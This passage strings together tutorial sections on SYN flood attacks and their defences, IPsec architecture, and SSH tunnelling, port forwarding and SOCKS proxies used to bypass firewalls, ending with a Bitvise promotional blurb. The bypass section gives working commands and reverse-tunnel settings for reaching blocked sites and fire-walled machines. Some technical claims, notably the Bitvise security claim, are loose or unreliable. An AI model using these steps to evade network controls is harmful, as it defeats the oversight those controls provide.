The attacker creates 100 other half-open connections from various IP addresses

STEP 5:  TCP buffer will be full at server’s end and server will be unable to accept any new connections

The TCP buffer will be full at the server’s end

SYN flood attacks can be performed in three different ways:

1. Direct attack-
   A SYN flood attack where IP address of the attacker is not spoofed is called a direct attack. In a direct attack, the attacker uses a single source device with a real IP address, therefore, the attacker can be traced easily and the requests from IP address of the malicious system can be blocked to prevent the attack.
2. Spoofed attack-
   A SYN flood attack where IP address of attacker is spoofed on each SYN packet is called a spoofed attack. Even though the IP address is spoofed on each packet they can be traced back to their source with help of the Internet service providers (ISPs).
3. Distributed attack-
   A SYN flood attack created using botnet is called distributed attack. The chances of tracing these attacks to source are extremely low. The attacker may also spoof the IP address of each distributed device to make it more difficult to trace.

SYN Flood Attack Prevention:
SYN Flood attacks can be prevented in a number of different ways. Some approaches include:

1. Increasing Backlog queue-
   There is a limit on the number of half-open connections on each operating system on a targeted device. One way to handle high volume of SYN packets is to increase the maximum number of half-open connections which will be allowed by the operating system. To increase the maximum backlog, the system must reserve additional memory resources which can handle all the new requests. If the system does not have sufficient memory to handle  increased backlog queue size, the performance of the system will be affected, but it will be better than denial-of-service.
2. Recycling the Oldest Half-Open TCP connection-
   In this strategy, the oldest half-open connection is overwritten once the backlog is filled. This strategy works only when connections can be fully established in less time than the backlog can be filled with malicious SYN packets. It fails when volume of attack is increased or if the backlog size is too small.
3. SYN Cookies-
   SYN cookies is an IP Spoofing attack mitigation technique whereby server replies to TCP SYN requests with crafted SYN-ACKs, without creating a new TCB for the TCP connection. A TCB is created for the respective TCP connection only when the client replies to this crafted response. This technique is used to protect the server’s resources from filling up under TCP SYN floods.

How SYN Cookies are used to preventing SYN Flood attack:
The way SYN Cookies solves this problem(SYN Flood attack) is to use a function that uses some information from the client’s SYN packet and some information from server-side to calculate a random initial sequence number. Let us assume this number as y-1, y-1 is sent to the client in an SYN + ACK message. If an ACK packet is received with a sequence number y, with the help of some packet header fields and some server-side information, a reverse function can verify that acknowledgement number is valid. If it is valid, a TCB is created and a connection is established. If it is invalid, the connection is refused. The advantage of SYN cookies is that the server doesn’t have to create and store a TCB upon reception of the SYN segment.

 IPSec (IP Security) architecture uses two protocols to secure the traffic or data flow. These protocols are ESP (Encapsulation Security Payload) and AH (Authentication Header). IPSec Architecture includes protocols, algorithms, DOI, and Key Management. All these components are very important in order to provide the three main services:

• Confidentiality
• Authentication
• Integrity

IP Security Architecture: 
 
1. Architecture: Architecture or IP Security Architecture covers the general concepts, definitions, protocols, algorithms, and security requirements of IP Security technology. 

2. ESP Protocol: ESP(Encapsulation Security Payload) provides a confidentiality service. Encapsulation Security Payload is implemented in either two ways:

• ESP with optional Authentication.
• ESP with Authentication.

Packet Format: 
 

• Security Parameter Index(SPI): This parameter is used by Security Association. It is used to give a unique number to the connection built between the Client and Server.
• Sequence Number: Unique Sequence numbers are allotted to every packet so that on the receiver side packets can be arranged properly.
• Payload Data: Payload data means the actual data or the actual message. The Payload data is in an encrypted format to achieve confidentiality.
• Padding: Extra bits of space are added to the original message in order to ensure confidentiality. Padding length is the size of the added bits of space in the original message.
• Next Header: Next header means the next payload or next actual data.
• Authentication Data This field is optional in ESP protocol packet format.

3. Encryption algorithm: The encryption algorithm is the document that describes various encryption algorithms used for Encapsulation Security Payload. 

4. AH Protocol: AH (Authentication Header) Protocol provides both Authentication and Integrity service. Authentication Header is implemented in one way only: Authentication along with Integrity. 
 
Authentication Header covers the packet format and general issues related to the use of AH for packet authentication and integrity. 

5. Authentication Algorithm: The authentication Algorithm contains the set of documents that describe the authentication algorithm used for AH and for the authentication option of ESP. 

6. DOI (Domain of Interpretation): DOI is the identifier that supports both AH and ESP protocols. It contains values needed for documentation related to each other. 

7. Key Management: Key Management contains the document that describes how the keys are exchanged between sender and receiver.

 SSH is a secure protocol that can be used to tunnel through firewalls. By using SSH, we can connect to a remote server and tunnel our traffic through the SSH connection. Firewalls are designed to protect networks from unauthorized access, but a firewall can also block legitimate traffic if not configured correctly. This can be a problem when we need to allow access to a specific application or service. One way to get around this issue is bypassing the firewall using ssh.

There are a few ways to bypass firewalls using SSH:

• SSH Tunneling: This is the most common way to bypass firewalls. SSH tunneling creates a secure connection between two hosts over an insecure network. This connection can be used to tunnel traffic through the firewall.
• SSH Port Forwarding: This is a less common way to bypass firewalls, but it can be useful in some cases. SSH port forwarding allows traffic to be forwarded from one port on the server to another port on the client.  This can be used to bypass firewalls that are blocking traffic on a specific port.
• SSH SOCKS Proxy: This is another less common way to bypass firewalls. SSH SOCKS proxy allows traffic to be forwarded through the SSH connection. This can be used to bypass firewalls that are blocking traffic on a specific port.

Step  to Perform SSH Tunneling:

In order to bypass a firewall using SSH tunneling, we will need to set up an SSH server on a machine that is outside the firewall. We will then need to connect to this server using an SSH client and forward traffic from the client machine to the server machine. For example, let’s say that we want to bypass a firewall that is blocking all traffic to port 80. We could set up an SSH server on a machine that has port 80 open and then connect to this server using an SSH client. Once we are connected, we could then forward traffic from the local machine to port 80  on the server machine. This would allow us to bypass the firewall and access websites that are normally blocked.

Now we see setting up a SSH server on a machine that is outside the firewall.

Step 1: Install the SSH server software on the machine.

• On Windows 11:
  • Navigate to Settings > Apps > Optional features and click on View features
  • Locate “OpenSSH server” feature, select it > check the checkbox, click Next, and then click Install.
• On Windows 10:
  • Navigate to Settings > Apps > Apps & features > Optional features and click on Add a feature
  • Locate “OpenSSH server” feature, expand the feature > check the checkbox, and select Installation.

 

Step 2: Configure the SSH server to listen on port 80 and allow traffic to port 80 through the firewall.

On Windows: 

• Navigate to Control Panel > System and Security > Windows Defender Firewall1 > Advanced Settings > Inbound Rules and add a new rule for port 80. 
• Or execute the following PowerShell command as the Administrator

New-NetFirewallRule -Name sshd -DisplayName 
'OpenSSH SSH Server' -Enabled True -Direction
Inbound -Protocol TCP -Action Allow -LocalPort
80 -Program "C:\Windows\System32\OpenSSH\sshd.exe"

 

Step 3:  Start the SSH server

• On Windows: Navigate to Control Panel > System and Security > Administrative Tools and open Services. Locate OpenSSH SSH  Server service and click Start the service.
• Once the SSH server is up and running, and accessible remotely, the next step is to download an SSH client to the target machine. 

Step to Connect the SSH Server and Forward Traffic:

Step 1: Install the SSH client software on the target machine: The OpenSSH client is included in Ubuntu Linux distributions by default. There are a few free SSH clients available for the Windows platform. The best one is Putty, which is available online on their site.

Step 2: Connect to the SSH server and forward traffic from the target machine to port 80 on the server machine. After starting Putty, fill in the following configuration details :

In the “Host Name” field, type the publicly 
accessible IP of the SSH server
Navigate to Connection > SSH > Tunnels
Add a new forwarded port:
Source Port = Target Port for Reverse Tunnelling
Destination = 127.0.0.1:[Target Port]
Direction = Remote
Click Add
Click Open to Start the SSH session

 

At this point, the target port will be mapped to the target remote SSH server. This means that clients on the remote network will be able to access the target PC as if it was on the remote network. Basically, this creates a private tunnel between two remote end-points, enabling remote administration of a fire-walled machine.

Perform SSH Port Forwarding:

Assuming we have SSH access to a remote server, we can use SSH port forwarding to bypass firewalls.  For example, let’s say we want to access a website that is blocked by a firewall. We can use SSH port forwarding to tunnel traffic from the local machine to the remote server, and then from the remote server to the website.

To do this, we would first SSH into the remote server. Then, we would use the following command to forward  traffic from the local machine (port, 8080) to the remote server (port 80):

ssh -L 8080:localhost:80 user@remote.server.com

Now, we can access the website by going to http://localhost:8080 in the web browser. The traffic will be tunneled through the SSH connection, and the remote server will act as a proxy.

We can also use SSH port forwarding to tunnel traffic from the remote server to the local machine. For example, let’s say we want to access a database that is only accessible from the remote server. We can use SSH port forwarding to tunnel traffic from the remote server to the local machine (port 3306) and then connect to the database using the local machine.

To do this, we would first SSH into the remote server. Then, we would use the following command to forward traffic from the remote server (port 3306) to the local machine (port 3306):

ssh -R 3306:localhost:3306 user@remote.server.com

Now, we can connect to the database using the local machine. The traffic will be tunneled through the SSH connection, and the local machine will act as a proxy.

Perform SSH SOCKS Proxy:

Assuming we have an SSH server running on a remote machine that we can access:

Step 1: On the local machine, open a terminal and run the following command:

ssh -D 9999 -f -C -q -N username@remotemachine

Step 2: This will establish a SOCKS proxy on port 9999 of the local machine.

Step 3: To use the proxy, configure the browser or other application to use a SOCKS proxy on localhost:9999.

Step 4:  Browse the web all traffic will be tunneled through the SSH connection.

 Bitvise SSH Client uses a tunneling method to ensure that your data stays encrypted from machine to machine. You can create tunnels up to five hops deep, which means that someone with malicious intent could only access your data if they were on the same network as you are. Whenever you log in with Bitvise SSH Client, all traffic between your computer and the remote system is automatically secured by SSH. Every time you make an update, your files are immediately encrypted before they get there. In short, It is a reliable way of preventing unauthorized access when you’re away from your computer.